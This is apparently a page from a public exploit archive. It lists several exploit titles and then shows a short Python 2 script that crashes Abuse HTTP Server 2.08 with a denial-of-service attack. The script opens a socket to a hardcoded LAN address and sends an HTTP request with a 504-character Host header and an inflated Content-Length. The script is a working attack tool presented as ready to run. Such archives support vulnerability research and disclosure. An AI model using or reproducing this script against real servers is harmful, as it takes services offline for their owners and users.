Zabbix 2.2 < 3.0.3 - Remote Code Execution with API JSON-RPC
Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution

Open Upload 0.4.2 - Multiple Cross-Site Request Forgery Vulnerabilities

NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities
NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities

FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation
FreePBX 13 / 14 - Remote Command Execution / Privilege Escalation

Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit
EasyFTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit

Android 5.0 <= 5.1.1 -  Stagefright .MP4 tx3g Integer Overflow (Metasploit)
2016-09-28 11:55:43 +00:00

33 lines
No EOL
983 B
Python
Executable file
Raw Blame History

'''
source: http://www.securityfocus.com/bid/62723/info
Abuse HTTP Server is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause denial-of-service conditions.
Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected.
'''
#!/usr/bin/python
import socket
import os
import sys
crash = "0" * 504
buffer="GET / HTTP/1.1\r\n"
buffer+="Host: " + crash + "\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
buffer+="Content-Length : 1048580\r\n\r\n"
print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com"
print "[*] Change some option in code with your self"
print "[*] Connect to host and send payload"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("192.168.1.101", 80))
expl.send(buffer)
print "[*] Server Disconected"
expl.close()
Reference in a new issue View git blame Copy permalink